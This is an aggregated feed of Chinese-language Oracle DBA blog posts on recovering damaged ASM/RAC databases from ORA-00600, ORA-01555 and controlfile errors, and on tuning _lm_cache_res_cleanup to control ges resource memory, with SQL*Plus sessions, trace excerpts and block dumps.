Quantcast
Channel: 95cc9c08c466d7576a985d536da1f40e
Viewing all 49 articles
Browse latest View live

数套ASM RAC的恢复案例

$
0
0

本站文章除注明转载外,均为本站原创: 转载自love wife & love life —Roger 的Oracle技术博客

本文链接地址: 数套ASM RAC的恢复案例

前不久帮助某客户恢复了6套Oracle RAC,均为ASM,而且版本均为10.2.0.4。熬夜好几天,差点吐血了。
这里以其中一套库的恢复进行简单说明,跟大家分享。
其中几套基本上都遇到了如下的ORA-00600 错误:

Thu Dec 31 11:55:46 2015
SUCCESS: diskgroup DG1 was mounted
Thu Dec 31 11:55:50 2015
Errors in file /oracle/admin/xxx/udump/xxx1_ora_28803.trc:
ORA-00600: internal error code, arguments: [kccpb_sanity_check_2], [13715626], [13715623], [0x000000000], [], [], [], []
SUCCESS: diskgroup DG1 was dismounted
Thu Dec 31 11:55:51 2015

对于该错误,其实很简单,主要是因为控制文件损坏,通过重建控制文件或者利用备份的控制文件进行restore即可进行mount;甚至于我们利用控制文件快照都可以进行数据库mount;然后接着进行恢复操作。在恢复的过程中还遇到了如下的错误:

Errors in file /oracle/admin/xxx/udump/xxx1_ora_6990.trc:
ORA-00600: internal error code, arguments: [kclchkblk_4], [3431], [18446744072948603858], [3431], [18446744072948586897], [], [], []
Tue Jan  5 10:52:28 2016
Errors in file /oracle/admin/xxx/bdump/xxx1_arc0_8205.trc:
ORA-19504: failed to create file "+DG1/xxx/archivelog/1_2_900069464.dbf"
ORA-17502: ksfdcre:4 Failed to create file +DG1/xxx/archivelog/1_2_900069464.dbf
ORA-00600: internal error code, arguments: [kffbAddBlk04], [], [], [], [], [], [], []
Tue Jan  5 10:52:28 2016
ARC0: Error 19504 Creating archive log file to '+DG1/xxx/archivelog/1_2_900069464.dbf'
ARCH: Archival stopped, error occurred. Will continue retrying
Tue Jan  5 10:52:30 2016
ORACLE Instance xxx1 - Arc

上述的ORA-00600错误其实很简单,主要是数据块SCN的问题。这里以其中一套库的恢复进行大致说明,因为在恢复该库的过程中,遇到了一件十分神奇的事情。

SQL> startup mount pfile='/tmp/p.ora';
ORACLE instance started.

Total System Global Area 2.1475E+10 bytes
Fixed Size                  2122368 bytes
Variable Size            2399145344 bytes
Database Buffers         1.9059E+10 bytes
Redo Buffers               14651392 bytes
Database mounted.
SQL> ALTER DATABASE ADD LOGFILE THREAD 2
  2    GROUP 3 (
  3      '+DG/xxxx/onlinelog/group_3.271.752099989',
  4      '+DG/xxxx/onlinelog/group_3.272.752099991'
  5    ) SIZE 100M REUSE,
  6    GROUP 4 (
  7      '+DG/xxxx/onlinelog/group_4.273.752099991',
  8      '+DG/xxxx/onlinelog/group_4.274.752099993'
  9    ) SIZE 100M REUSE,
 10    GROUP 6 (
 11      '+DG/xxxx/onlinelog/group_6.275.752099993',
 12      '+DG/xxxx/onlinelog/group_6.276.752099993'
 13    ) SIZE 100M REUSE;
ALTER DATABASE ADD LOGFILE THREAD 2
*
ERROR at line 1:
ORA-01276: Cannot add file +DG/xxxx/onlinelog/group_3.271.752099989.  File has
an Oracle Managed Files file name.

由于是ORACLE RAC,因此重建控制文件之后,是需要添加redo logfile的;然而add logfile 发现报上述错误。根据Oracle metalink的一些方法均不能成功,都报上面的错误,确实很怪异。
有些人看上述的错误,可能会认为是设置了OMF的参数,其实这里并不是,我将相关参数全部修改之后,错误依旧。
这里实际上添加logfile时,只写磁盘组名称就行了,不需要写绝对路径。
接着在进行recover后进行open resetlogs打开时,报错ORA-01248,如下:

SQL> startup mount pfile='/tmp/p.ora';
ORACLE instance started.

Total System Global Area 2.1475E+10 bytes
Fixed Size                  2122368 bytes
Variable Size            2399145344 bytes
Database Buffers         1.9059E+10 bytes
Redo Buffers               14651392 bytes
Database mounted.
SQL> recover database using backup controlfile until cancel;
ORA-00279: change 13300428179625 generated at 04/04/2013 12:51:35 needed for
thread 1
ORA-00289: suggestion : +DG/archivelog/arch1_752099890_12809_1.log
ORA-00280: change 13300428179625 for thread 1 is in sequence #12809

Specify log: {<RET>=suggested | filename | AUTO | CANCEL}
auto
ORA-00308: cannot open archived log
'+DG/archivelog/arch1_752099890_12809_1.log'
ORA-17503: ksfdopn:2 Failed to open file
+DG/archivelog/arch1_752099890_12809_1.log
ORA-15173: entry 'arch1_752099890_12809_1.log' does not exist in directory
'archivelog'

ORA-00308: cannot open archived log
'+DG/archivelog/arch1_752099890_12809_1.log'
ORA-17503: ksfdopn:2 Failed to open file
+DG/archivelog/arch1_752099890_12809_1.log
ORA-15173: entry 'arch1_752099890_12809_1.log' does not exist in directory
'archivelog'

ORA-01547: warning: RECOVER succeeded but OPEN RESETLOGS would get error below
ORA-01194: file 1 needs more recovery to be consistent
ORA-01110: data file 1: '+DG/xxxx/datafile/system.256.752099833'

SQL> alter database open resetlogs;
alter database open resetlogs
*
ERROR at line 1:
ORA-01248: file 42 was created in the future of incomplete recovery
ORA-01110: data file 42: '+DG/xxxx/datafile/file_tab_xdidx03.ora'

这个错误还是比较少见,实际上网上那些说法,以及Oracle mos提供的解决方法我发现都不行。
无奈只能先将其offline ,然后再进行恢复。再进行open之前我查询了当前的checkpoint scn如下:

SQL> select file#,checkpoint_change# from v$datafile;

     FILE#      CHECKPOINT_CHANGE#
---------- -----------------------
         1          14731601024328
         2          14731601024328
         3          14731601024328
         4          13300428179625
         5          14731601024328
         6          14731601024328
         7          14731601024328
     .......
        39          14731601024328
        40          14731601024328
        41          14731601024328
        42          14731601024328
        43          14731601024328

43 rows selected.

SQL> c/datafile/datafile_header
  1* select file#,checkpoint_change# from v$datafile_header
SQL> /

     FILE#      CHECKPOINT_CHANGE#
---------- -----------------------
         1          14731601024328
         2          14731601024328
         3          14731601024328
         4          13300428179625
         5          14731601024328
         6          14731601024328
         7          14731601024328
         ......
        40          14731601024328
        41          14731601024328
        42          14731601024328
        43          14731601024328

43 rows selected.

由于open失败,这里我想着是不是这2个文件有问题,又用之前的快照控制文件进行recover一把,然后再次用重建的控制文件起来数据库进行recover,发现神奇的事情出现了:

SQL> recover database using backup controlfile until cancel;
ORA-00279: change 13305808683011 generated at 01/11/2016 21:09:02 needed for
thread 1
ORA-00289: suggestion : +DG/archivelog/arch1_900882531_1_1.log
ORA-00280: change 13305808683011 for thread 1 is in sequence #1

Specify log: {<RET>=suggested | filename | AUTO | CANCEL}
auto
ORA-00308: cannot open archived log '+DG/archivelog/arch1_900882531_1_1.log'
ORA-17503: ksfdopn:2 Failed to open file +DG/archivelog/arch1_900882531_1_1.log
ORA-15173: entry 'arch1_900882531_1_1.log' does not exist in directory
'archivelog'

ORA-00308: cannot open archived log '+DG/archivelog/arch1_900882531_1_1.log'
ORA-17503: ksfdopn:2 Failed to open file +DG/archivelog/arch1_900882531_1_1.log
ORA-15173: entry 'arch1_900882531_1_1.log' does not exist in directory
'archivelog'

ORA-01547: warning: RECOVER succeeded but OPEN RESETLOGS would get error below
ORA-01194: file 1 needs more recovery to be consistent
ORA-01110: data file 1: '+DG/xxxx/datafile/system.256.752099833'

SQL> alter database datafile 42 offline;
alter database datafile 43 offline;
Database altered.

SQL> 

Database altered.

SQL>
SQL> alter database open resetlogs;
alter database open resetlogs
*
ERROR at line 1:
ORA-01092: ORACLE instance terminated. Disconnection forced

我们可以看到open 失败了,对于open失败的 情况,我们首先是看alert log,接着10046 trace。

SQL> startup nomount pfile='/tmp/p.ora';
ORACLE instance started.

Total System Global Area 2.1475E+10 bytes
Fixed Size                  2122368 bytes
Variable Size            2399145344 bytes
Database Buffers         1.9059E+10 bytes
Redo Buffers               14651392 bytes
SQL> oradebug setmypid
Statement processed.

SQL> alter database mount;

Database altered.

SQL> recover database;
Media recovery complete.
SQL> alter database open;
alter database open
*
ERROR at line 1:
ORA-01092: ORACLE instance terminated. Disconnection forced
ORA-00704: bootstrap process failure
ORA-00704: bootstrap process failure
ORA-00604: error occurred at recursive SQL level 1
ORA-01555: snapshot too old: rollback segment number 4 with name "_SYSSMU4$"
too small

这里我又屏蔽了undo相关的参数。再次尝试发现错误依旧。再次启动,神奇的事情出现了,SCN居然倒退了?

SQL> startup mount  pfile='/tmp/p.ora';
ORACLE instance started.

Total System Global Area 2.1475E+10 bytes
Fixed Size                  2122368 bytes
Variable Size            2399145344 bytes
Database Buffers         1.9059E+10 bytes
Redo Buffers               14651392 bytes
Database mounted.
SQL> recover database;
Media recovery complete.

SQL> select checkpoint_change#,file# from v$datafile;

         CHECKPOINT_CHANGE#      FILE#
--------------------------- ----------
             13314398637607          1
             13314398637607          2
             13314398637607          3
             13314398637607          4
             13314398637607          5
            ......
             13314398637607         38
             13314398637607         39
             13314398637607         40
             13314398637607         41
                          0         42
                          0         43

43 rows selected.

SQL> select checkpoint_change#,file#,checkpoint_time from v$datafile_header;

         CHECKPOINT_CHANGE#      FILE# CHECKPOIN
--------------------------- ---------- ---------
             13314398637607          1 11-JAN-16
             13314398637607          2 11-JAN-16
             13314398637607          3 11-JAN-16
             13314398637607          4 11-JAN-16
             13314398637607          5 11-JAN-16
             ......
             13314398637607         39 11-JAN-16
             13314398637607         40 11-JAN-16
             13314398637607         41 11-JAN-16
             14731601024328         42 30-DEC-15
             14731601024328         43 30-DEC-15

43 rows selected.

很明显,这个133的scn 回退到了过去2年前了,出现时空穿越了。。。。 当然,open肯定还是报错:

SQL> alter database open;
alter database open
*
ERROR at line 1:
ORA-01092: ORACLE instance terminated. Disconnection forced
ORA-00704: bootstrap process failure
ORA-00704: bootstrap process failure
ORA-00604: error occurred at recursive SQL level 1
ORA-01555: snapshot too old: rollback segment number 4 with name "_SYSSMU4$"
too small

这里先不管为啥连数据文件头的SCN都倒退了(之前被offline的2个文件scn是OK的).  通过10046 trace得到如下内容:

PARSING IN CURSOR #5 len=52 dep=1 uid=0 oct=3 lid=0 tim=1418474357830663 hv=429618617 ad='5db7ea50'
select ctime, mtime, stime from obj$ where obj# = :1
END OF STMT
PARSE #5:c=0,e=531,p=0,cr=0,cu=0,mis=1,r=0,dep=1,og=4,tim=1418474357830659
BINDS #5:
kkscoacd
 Bind#0
  oacdty=02 mxl=22(22) mxlc=00 mal=00 scl=00 pre=00
  oacflg=08 fl2=0001 frm=00 csi=00 siz=24 off=0
  kxsbbbfp=2ad7172aa020  bln=22  avl=02  flg=05
  value=20
EXEC #5:c=1000,e=673,p=0,cr=0,cu=0,mis=1,r=0,dep=1,og=4,tim=1418474357831431
WAIT #5: nam='db file sequential read' ela= 9843 file#=1 block#=218 blocks=1 obj#=-1 tim=1418474357841421
.....
FETCH #6:c=17997,e=64936,p=23,cr=566,cu=0,mis=0,r=1,dep=2,og=3,tim=1418474357907669
STAT #6 id=1 cnt=1 pid=0 pos=1 obj=15 op='TABLE ACCESS BY INDEX ROWID UNDO$ (cr=566 pr=23 pw=0 time=64913 us)'
STAT #6 id=2 cnt=1 pid=1 pos=1 obj=34 op='INDEX UNIQUE SCAN I_UNDO1 (cr=1 pr=1 pw=0 time=5769 us)'
WAIT #5: nam='db file sequential read' ela= 13031 file#=40 block#=167538 blocks=1 obj#=-1 tim=1418474357920819
FETCH #5:c=19996,e=89548,p=25,cr=568,cu=0,mis=0,r=0,dep=1,og=4,tim=1418474357921006

我们这里可以看到,这里报错的SQL读取了file 1 block 218,以及file 40 block 167538。
对于file 1 block 218,我dump 发现没有活动事务;而file 40 block 167538则为undo 块.

SQL> select name from v$datafile where file#=40;

NAME
--------------------------------------------------------------------------------
+DG/xxxx/datafile/undotbs4

同时dump 了这个undo 块,发现确实感觉有些异常,如下所示:

********************************************************************************
UNDO BLK:
xid: 0x0009.01b.0014320a  seq: 0xa47 cnt: 0x1   irb: 0x1   icl: 0x0   flg: 0x0000

 Rec Offset      Rec Offset      Rec Offset      Rec Offset      Rec Offset
---------------------------------------------------------------------------
0x01 0x0014     

*-----------------------------
* Rec #0x1  slt: 0x1b  objn: 55417(0x0000d879)  objd: 296039  tblspc: 20(0x00000014)
*       Layer:  10 (Index)   opc: 21   rci 0x00
Undo type:  Regular undo   Last buffer split:  No
Temp Object:  No
Tablespace Undo:  No
rdba: 0x0a028e71
*-----------------------------
index general undo (branch) operations
KTB Redo
op: 0x05  ver: 0x01
op: R  itc: 2
 Itl           Xid                  Uba         Flag  Lck        Scn/Fsc
0x01   0x0009.01b.0014320a  0x0a028e71.0a47.04  ----    1  fsc 0x0000.00000000
0x02   0x0009.02b.001428b6  0x0a028e6f.0a47.06  ----  112  fsc 0x0000.00000000
Dump kdige : block dba :0x05d630b3, seghdr dba: 0x06076e89
restore block before image

由于所有的文件头SCN 都倒退了,正常open 都报错,只能推进SCN,而且SCN必须要比这个undo block的最大SCN 还要大一些才行,通过在pfile文件中加入参数*._minimum_giga_scn即可。

SQL> conn /as sysdba
Connected to an idle instance.
SQL> startup mount pfile='/tmp/p.ora';
ORACLE instance started.

Total System Global Area 2.1475E+10 bytes
Fixed Size                  2122368 bytes
Variable Size            2399145344 bytes
Database Buffers         1.9059E+10 bytes
Redo Buffers               14651392 bytes
Database mounted.
SQL> show parameter job

NAME                                 TYPE        VALUE
------------------------------------ ----------- ------------------------------
job_queue_processes                  integer     10
SQL> alter system set job_queue_processes=0;

System altered.

SQL> alter database open;

Database altered.

SQL> drop tablespace undotbs3 including contents and datafiles;

Tablespace dropped.

SQL> drop tablespace undotbs4 including contents and datafiles;

Tablespace dropped.

顺利打开数据库之后,立即将原有的undo 表空间进行drop 并重建。
虽然数据库是打开了,然而其中有2个数据文件之前被我们offline了,而且中间进行了resetlogs操作,因此现在无法进行正常online了。

SQL> select file#,checkpoint_change# from v$datafile;

     FILE#             CHECKPOINT_CHANGE#
---------- ------------------------------
         1                 14759124431097
         2                 14759124431097
         3                 14759124431097
         4                 14759124431097
         5                 14759124431097
        ......
        36                 14759124431097
        37                 14759124431097
        38                 14759124431097
        41                 14759124431097
        42                              0
        43                              0
        44                 14759124431097
        45                 14759124431097

43 rows selected.

SQL> alter database datafile 42 online;
alter database datafile 42 online
*
ERROR at line 1:
ORA-01190: control file or data file 42 is from before the last RESETLOGS
ORA-01110: data file 42: '+DG/xxxx/datafile/file_tab_xxx03.ora'

SQL> alter database datafile 43 online;
alter database datafile 43 online
*
ERROR at line 1:
ORA-01190: control file or data file 43 is from before the last RESETLOGS
ORA-01110: data file 43: '+DG/xxxx/datafile/file_tab1_xxx05.ora'

这里用bbed 将上面2个文件头相关信息修改掉,然后进行recover,可以顺利online文件。

SQL> recover datafile 42;
Media recovery complete.

SQL> alter database datafile 42 online;

Database altered.

SQL> recover datafile 43;
Media recovery complete.
SQL> alter database datafile 43 online;

Database altered.

SQL> select file#,checkpoint_change# ,status from v$datafile;

     FILE#             CHECKPOINT_CHANGE# STATUS
---------- ------------------------------ -------
         1                 14759124821491 SYSTEM
         2                 14759124821491 SYSTEM
         3                 14759124821491 ONLINE
         4                 14759124821491 ONLINE
         5                 14759124821491 ONLINE
      。。。。。。
        36                 14759124821491 ONLINE
        37                 14759124821491 ONLINE
        38                 14759124821491 ONLINE
        41                 14759124821491 ONLINE
        42                 14759124831966 ONLINE
        43                 14759124832115 ONLINE
        44                 14759124821491 ONLINE
        45                 14759124821491 ONLINE

43 rows selected.

SQL> alter system checkpoint;

System altered.

SQL> select file#,checkpoint_change# ,status from v$datafile;

     FILE#             CHECKPOINT_CHANGE# STATUS
---------- ------------------------------ -------
         1                 14759124832224 SYSTEM
         2                 14759124832224 SYSTEM
         3                 14759124832224 ONLINE
         4                 14759124832224 ONLINE
         5                 14759124832224 ONLINE
       ......
        38                 14759124832224 ONLINE
        41                 14759124832224 ONLINE
        42                 14759124832224 ONLINE
        43                 14759124832224 ONLINE
        44                 14759124832224 ONLINE
        45                 14759124832224 ONLINE

43 rows selected.

最后建议将数据库expdp 导出并重建。到此告一段落!

Related posts:

  1. 非归档恢复遭遇ORA-01190 和 ORA-600 [krhpfh_03-1202]–恢复小记
  2. About recreate controlfile ?
  3. datafile 也能跨resetlogs ?
  4. 1.4TB ASM(RAC) 磁盘损坏恢复小记
  5. 数据库open报错ORA-01555: snapshot too old

从未遇见的错误ora-00600 [3712] 恢复案例

$
0
0

本站文章除注明转载外,均为本站原创: 转载自love wife & love life —Roger 的Oracle技术博客

本文链接地址: 从未遇见的错误ora-00600 [3712] 恢复案例

在Oracle数据库的日常维护中,我们可能经常会遇到一些从未见过的错误,甚至莫名其妙的错误。很多时候,甚至通过metalink、baidu、甚至google 都无法搜索到相关内容。这不,昨天公司南区同事让帮忙恢复的的一个客户数据库;据说是归档数据库,没有备份,重启实例后就无法打开数据库了。

我也是第一次听说这种事情,看了下居然是Oracle 11.2.0.3的数据库,还有这样起码的事情,确实有点匪夷所思。首先我们来看下是报错是什么样的。

 

 

 

 

 

 

 

 

 

 

 

 

 

看到这个错误。我感觉有一定似曾相识的感觉,但是有又说不来具体是什么错误。不过从错误号来看,我可以大致判断跟什么内容有关系。这里我拓展一下,对于Oracle ora-00600 错误,metalink有一篇详细的文档描述,里面对600错误后面的错误编号进行了分类。对于该文档大家务必了解下。所以现在即使我从未见过的ora-00600错误,我仍然可以第一眼就能大致判断是哪方面的问题。这里列举下:

Ora-600 Base	Functionality	Description
2000	server/rcv	Cache Op
2100	server/rcv	Control File mgmt
2200	server/rcv	Misc (SCN etc.)
2400	server/rcv	Buffer Instance Hash Table
2600	server/rcv	Redo file component
2800	server/rcv	Db file
3000	server/rcv	Redo Application
3200	server/cache	Buffer manager
3400	server/rcv	Archival & media recovery component
3600	server/rcv	recovery component
3700	server/rcv	Thread component
3800	server/rcv	Compatibility segment

 

 

从描述来看,我们可以大致判断,该错误肯定跟redo 有关系。我们再回头去看下alert log的信息,可以看到一行比较关键的信息:crash recovery due to error 600.

对于Oracle 数据库的open过程,我们知道需要经过nomount–mount–open这样几个过程,如果是异常关机例如强制abort的情况,那么open数据库时,Oracle 需要进行instance recovery;实际上我查询v$Log 也可以发现current redo logfile 的next_change# 为无穷大.

首先我尝试手工进行了一次recover database,没有任何问题,然后alter database open还是报上面的3712错误。这里我发现一个问题,所有的scn都已经变化,而且更新到了一致的状态。但是为啥还是报错呢?

我们知道其实Oracle open的时候不仅仅是需要去进行实例恢复,实例恢复完成后,需要顺利open数据库。如果我们试想是否存在这样一种场景:

假设当前我们恢复的数据库scn已经到了100000,然而实例恢复完成后open时发现下一个要更新的scn比当前的要小(比如99999),会怎么样呢? 很明显这是会报错的。

很多人或许看不懂,甚至不理解我为什么会这样设想,这里主要有2个因素:

1、 基于对于数据库原理的基本理解,深入了解oracle数据库open的过程

2、细心观察上述的ORA-00600 错误.

ok,就拿这个错误来讲 [3371],[612688841],[3371],[612688840];当我们看到这一串数字的时候,我们应该认为或者试想这写数字都是什么含义 ?

根据我们的数据库理解和经验来判断,通常都是表示序列,dba地址,文件号,scn等等这些。

我想,稍微有一点常识的人可能都能看出来,这里应该是表示的SCN。或许有人说为什么这里会是表示的scn呢?

如果这样想,那说明你不了解Oracle scn的基本结构。Oracle 中的scn,分为高位和低位两部分组成。大致上如下:

scn最低值是0×0000.00000000,最高值是0xffff.ffffffff。高位是scn wrap,即0×0000,低位是scn base,即后面的8个位。正确的SCN应该是=scn warp * power(2,32)+scn base

能够想到这里,我想我们可以大致判断这里的3371 应该是scn wrap值,而后面的612688841应该是scn base。将scn换算一下然后和文件头的最新scn进行比较,发现完全符合。这里能够验证我们的判断。

到这里,我们可以发现一个问题,scn不对啊? 为什么不对? 因为这里出现了2个scn,分别是:

3371*power(2,32)+612688841 和 3371*power(2,32)+612688840

很明显,这2个值大小不同,我想Oracle 肯定是进行判断,发现即将产生的scn比我们当前的scn还要小,才会出现这个情况。那么后面要小的scn就是有问题的scn。而这个scn 比如来源于控制文件。

想到这里,我就知道,我应该如何去完美解决这个问题了。那么答案就是重建控制文件

如下是恢复的基本步骤,重建控制文件的步骤就不再描述了。

 

 

 

 

 

 

产生重建控制文件的脚本后,重建控制文件,记得noresetlogs 方式去创建即可(rac环境需要修改cluster_database=false);创建完毕后直接recover一把,然后顺利open数据库,完美收工!

 

 

 

 

 

 

 

补充:

1、后面我查询发现这极有可能是Oracle 11.2.0.3的bug:

Bug 16432211 : ORA-00600 [KCRFNL_3], LGWR… TERMINATING THE INSTANCE, ORA-00600 [3712]

后面我查询之前的alert log和trace 发现基本上完全一致。

Related posts:

  1. ora-00600 [kddummy_blkchk] solution
  2. 非归档遭遇ora-00600 [kcratr_nab_less_than_odr]的恢复
  3. ora-00600 kccpb_sanity_check_2和kclchkblk_4的恢复case
  4. Deep in ora-00600 [4193]

通过调整_lm_cache_res_cleanup解决shared Pool问题

$
0
0

本站文章除注明转载外,均为本站原创: 转载自love wife & love life —Roger 的Oracle技术博客

本文链接地址: 通过调整_lm_cache_res_cleanup解决shared Pool问题

前不久某客户的一套核心数据库(10.2.0.4.12),据说每间隔一段时间就必须重启,因为会报ORA-04031错误。查询发现shared pool差不多5G的样子,其实ges resource消耗了差不多3.5G shared pool 内存,也确实有些离谱了。

SQL> c/gcs/ges
  1* select * from v$sgastat where name like 'ges%'
SQL> /

POOL         NAME                                 BYTES
------------ ------------------------------- ----------
shared pool  ges big msg p                       461440
shared pool  ges resource hash seq tab            32768
shared pool  ges shared global area               23928
shared pool  ges regular msg buffers            1254008
shared pool  ges enqueue multiple free             1280
shared pool  ges res mastership bucket             4096
shared pool  ges deadlock xid freelist            11264
shared pool  ges resource pools                    1984
shared pool  ges recovery domain table              176
shared pool  ges reserved msg buffers           8240008
shared pool  ges big msg buffers               15936168
shared pool  ges process array                  1273272
shared pool  ges enqueue max. usage pe               32
shared pool  ges lmd process descripto             2760
shared pool  ges process hash table               44000
shared pool  ges enqueue cur. usage pe               32
shared pool  ges ipc instance maps                  384
shared pool  ges lms process descripto             5520
shared pool  ges resource                    3696886168
shared pool  ges deadlock xid hash tab            17800
shared pool  ges resource hash table            1441792
shared pool  ges scan queue array                   176

我们可以看到,ges resource消耗的内存确实非常高。那么这里为什么ges resource 消耗的内存这么高呢?

通过检查v$resource_limit发现存在有些异常,如下所示:

RESOURCE_NAME        CURRENT_UTILIZATION MAX_UTILIZATION INITIAL_ALLOCATION   LIMIT_VALUE
-------------------- ------------------- --------------- -------------------- -------------
ges_procs                            181             439       1001                 1001
ges_ress                               0               0      27462            UNLIMITED
ges_locks                              0               0      40358            UNLIMITED
ges_cache_ress                   8559179        14625461          0            UNLIMITED
ges_reg_msgs                         243             898       2750            UNLIMITED
ges_big_msgs                          41           35280       1934            UNLIMITED
ges_rsv_msgs                           0               0       1000                 1000

SQL> select startup_time from v$instance;

STARTUP_TIME
-------------------
2015-10-26 05:02:04

我们可以发现,ges_cache_ress 的max 和 current 都很大。大的超乎想象。从现象来看,可以大致判断是shared pool中cache的 ges resource没有及时回收,导致ges resource占据的内存比较大。

想到这里,我心中产生了一个疑问,是否Oracle 有相关隐含参数来控制这个资源回收的机制呢?我们知道Oracle 通常都是这么干的,通过隐含参数来控制某项功能或机制。

搜下发现了2个相关的bug,确实可能出现ges resource 消耗内存很高的情况,最后产生ora-04031错误。

其中文档中提到了一个参数_lm_cache_res_cleanup;通过调整该参数,来该表ges resource的回收机制;有可能避免这个情况。

方法好用不,要试试才知道,果断告知客户进行调整,然后观察几天后,发现似乎ges resource的内存消耗得到了有效控制:

SQL> select * from v$sgastat where name like '%ges res%';                               

POOL                     NAME                               BYTES
------------------------ ----------------------------- ----------
shared pool              ges resource hash seq tab          32768
shared pool              ges res mastership bucket           4096
shared pool              ges resource pools                  1984
shared pool              ges reserved msg buffers         8240008
shared pool              ges resource                   215312592
shared pool              ges resource hash table          1441792

6 rows selected.                                                                        

SQL> alter session set nls_date_format='yyyy-mm-dd hh24:mi:ss';                         

Session altered.                                                                        

SQL> select startup_time from v$instance;                                               

STARTUP_TIME
-------------------
2016-01-28 23:08:27                                                                     

SQL> select sysdate from dual;                                                          

SYSDATE
-------------------
2016-02-03 10:24:17

有些人可能会说,才几天可能看不出来吧?实际上,之前客未调整之前,重启实例才1天,ges resource就超过300M了。

备注:  bug 9026008,bug 10042937 跟该参数有关系,影响版本为11.1,11.2部分版本,大家可以阅读下。

Related posts:

  1. Parallel Query 导致的ORA-04031

某客户一套15TB的数据库恢复小记

$
0
0

本站文章除注明转载外,均为本站原创: 转载自love wife & love life —Roger 的Oracle技术博客

本文链接地址: 某客户一套15TB的数据库恢复小记

该客户数据库在春节之前就出现故障,后面经过多人尝试恢复后,均为打开数据库;数据库在open时报如下错误:

Wed Jan 13 17:03:25 2016
ORA-01555 caused by SQL statement below (SQL ID: 4krwuz0ctqxdt, Query Duration=1452675805 sec, SCN: 0x0d6a.46c6524f):
Wed Jan 13 17:03:25 2016
select ctime, mtime, stime from obj$ where obj# = :1
Wed Jan 13 17:03:25 2016
Errors in file /u01/app/oracle/admin/xxxx/udump/xxxx1_ora_18274.trc:
ORA-00704: bootstrap process failure
ORA-00704: bootstrap process failure
ORA-00604: error occurred at recursive SQL level 1
ORA-01555: snapshot too old: rollback segment number 20 with name "_SYSSMU20$" too small
Error 704 happened during db open, shutting down database
USER: terminating instance due to error 704
Instance terminated by USER, pid = 18274
ORA-1092 signalled during: alter database open resetlogs...
Wed Jan 13 17:06:34 2016

该错误其实很场景,也恢复过太多这种情况了,这里不再过多描述。不过这里让我感觉很诧异的是该SQL的Query Duration 太大了。
根据经验,这种情况下可以直接推进SCN。可是当我们进行如下操作,发现不起作用:

alter session set events ’10015 trace name adjust_scn level 13740′;

进一步通过10046 trace跟踪发现该sql访问了如下几个block:

PARSING IN CURSOR #5 len=52 dep=1 uid=0 oct=3 lid=0 tim=1422682994194207 hv=429618617 ad='395fa870'
select ctime, mtime, stime from obj$ where obj# = :1
END OF STMT
PARSE #5:c=0,e=225,p=0,cr=0,cu=0,mis=1,r=0,dep=1,og=4,tim=1422682994194205
BINDS #5:
kkscoacd
 Bind#0
  oacdty=02 mxl=22(22) mxlc=00 mal=00 scl=00 pre=00
  oacflg=08 fl2=0001 frm=00 csi=00 siz=24 off=0
  kxsbbbfp=2b7694a4aea8  bln=22  avl=02  flg=05
  value=20
EXEC #5:c=0,e=398,p=0,cr=0,cu=0,mis=1,r=0,dep=1,og=4,tim=1422682994194653
WAIT #5: nam='db file sequential read' ela= 20378 file#=1 block#=218 blocks=1 obj#=-1 tim=1422682994215120
WAIT #5: nam='db file sequential read' ela= 480   file#=1 block#=219 blocks=1 obj#=-1 tim=1422682994215712
WAIT #5: nam='db file sequential read' ela= 18990 file#=1 block#=122 blocks=1 obj#=-1 tim=1422682994234841
。。。。。。。
EXEC #6:c=0,e=141,p=0,cr=0,cu=0,mis=0,r=0,dep=2,og=3,tim=1422682994267351
FETCH #6:c=0,e=34,p=0,cr=2,cu=0,mis=0,r=1,dep=2,og=3,tim=1422682994267413
STAT #6 id=1 cnt=1 pid=0 pos=1 obj=15 op='TABLE ACCESS BY INDEX ROWID UNDO$ (cr=2 pr=0 pw=0 time=28 us)'
STAT #6 id=2 cnt=1 pid=1 pos=1 obj=34 op='INDEX UNIQUE SCAN I_UNDO1 (cr=1 pr=0 pw=0 time=16 us)'
WAIT #5: nam='db file sequential read' ela= 12312 file#=7 block#=4993 blocks=1 obj#=-1 tim=1422682994279882
WAIT #5: nam='db file sequential read' ela= 18776 file#=7 block#=4965 blocks=1 obj#=-1 tim=1422682994298789
WAIT #5: nam='db file sequential read' ela= 13157 file#=7 block#=4801 blocks=1 obj#=-1 tim=1422682994312081
WAIT #5: nam='db file sequential read' ela= 12519 file#=7 block#=4954 blocks=1 obj#=-1 tim=1422682994324726
WAIT #5: nam='db file sequential read' ela= 410 file#=7 block#=4952 blocks=1 obj#=-1 tim=1422682994325259
WAIT #5: nam='db file sequential read' ela= 5447 file#=7 block#=4778 blocks=1 obj#=-1 tim=1422682994330830
WAIT #5: nam='db file sequential read' ela= 12349 file#=7 block#=5184 blocks=1 obj#=-1 tim=1422682994343291
WAIT #5: nam='db file sequential read' ela= 11874 file#=5 block#=8645 blocks=1 obj#=-1 tim=1422682994355283
WAIT #5: nam='db file sequential read' ela= 4925 file#=5 block#=8595 blocks=1 obj#=-1 tim=1422682994360323
FETCH #5:c=4999,e=165865,p=15,cr=18,cu=0,mis=0,r=0,dep=1,og=4,tim=1422682994360535
ORA-00704: bootstrap process failure
ORA-00704: bootstrap process failure
ORA-00604: error occurred at recursive SQL level 1
ORA-01555: snapshot too old: rollback segment number 20 with name "_SYSSMU20$" too small

通过分别dump上述block,我们发现file 1 block 122 有点小问题,如下:

 seg/obj: 0x12  csc: 0xd6c.1abf4d18  itc: 1  flg: -  typ: 1 - DATA
     fsl: 0  fnx: 0x0 ver: 0x01

 Itl           Xid                  Uba         Flag  Lck        Scn/Fsc
0x01   0x003f.02e.001cc47d  0x01c012f4.8562.29  --U-    1  fsc 0x0000.1abf4d19

data_block_dump,data header at 0x8b3da44
===============
tsiz: 0x1fb8
hsiz: 0xea
pbl: 0x08b3da44
bdba: 0x0040007a
     76543210
flag=--------
ntab=1
nrow=108

通过脚本将该block copy到文件系统,bbed进行修改之后,再copy回asm diskgroup。
接着再次进行scn的推进,可以很顺利打开数据库。

这里需要注意的是,虽然打开了数据库,但是后面还有很多善后处理工作,比如我们dbv发现undo有坏块,那么就需要重建undo;同时检查alert log是否伴随其他的错误。

其次,对于强制open的数据库,我们建议通过mos脚本检查下数据字典是否存在异常;如果数据字典有明显异常,那么通常是需要通过逻辑导出来重建数据库的;否则一般不需要重建库。

对于是否需要重建库,我认为没有定论,安全起见是通常是建议重建数据库;或者数据库很小的时候也可以考虑重建;否则通过检查数据库告警,或者数据库运行一段时间没有其他异常,那么完全可以不重建数据库。

Related posts:

  1. 非归档恢复的一个模拟例子
  2. 某客户的5TB RAC 恢复小记
  3. 11.2.0.4 ASM RAC 恢复一个例子
  4. 某大学的数据库恢复过程
